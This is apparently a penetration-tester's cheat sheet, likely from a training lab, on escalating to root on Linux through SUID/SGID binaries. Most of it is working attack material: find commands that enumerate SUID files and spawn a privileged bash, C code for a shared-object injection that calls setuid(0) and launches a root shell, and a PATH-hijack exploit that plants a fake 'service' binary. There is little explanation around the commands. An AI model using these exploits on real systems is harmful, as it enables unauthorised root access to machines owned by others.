SUID / SGID
Find with +s
find /usr/bin -name find -exec /bin/bash -ip \;
SUID Commands
find / -user root -perm /4000 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -type f -name '*.txt' 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {}; > /tmp/suid
getcap -r / 2>/dev/null
SUID / SGID Executables - Known Exploits
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
- try to find existing exploit for findings (put main focus on items with know version) on https://www.exploit-db.com
SUID / SGID Executables - Shared Object Injection
find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
strace <program-location> 2>&1 | grep -iE "open|access|no such file"
- Run strace on the file and search the output for open/access calls and for "no such file" errors:
- If log will show that some external dependency are missing (/home/user/.config/libcalc.so), recreate them with own code
- Check if you can overwrite something
gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
libcalc.c
#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
setuid(0);
system("/bin/bash -p");
}
SUID / SGID Executables - Environment Variables
Run strings on the file to look for strings of printable characters
strings /usr/local/bin/suid-env
One line ("service apache2 start") suggests that the service executable is being called to start the webserver, however the full path of the executable (/usr/sbin/service) is not being used. What give us possibility to overwrite this
gcc -o /tmp/hack-lib/service /home/user/tools/suid/service.c
service.c
int main() {
setuid(0);
system("/bin/bash -p");
}
add new lib localization to PATH*
PATH=/tmp/hack-lib:$PATH
run to get root
/usr/local/bin/suid-env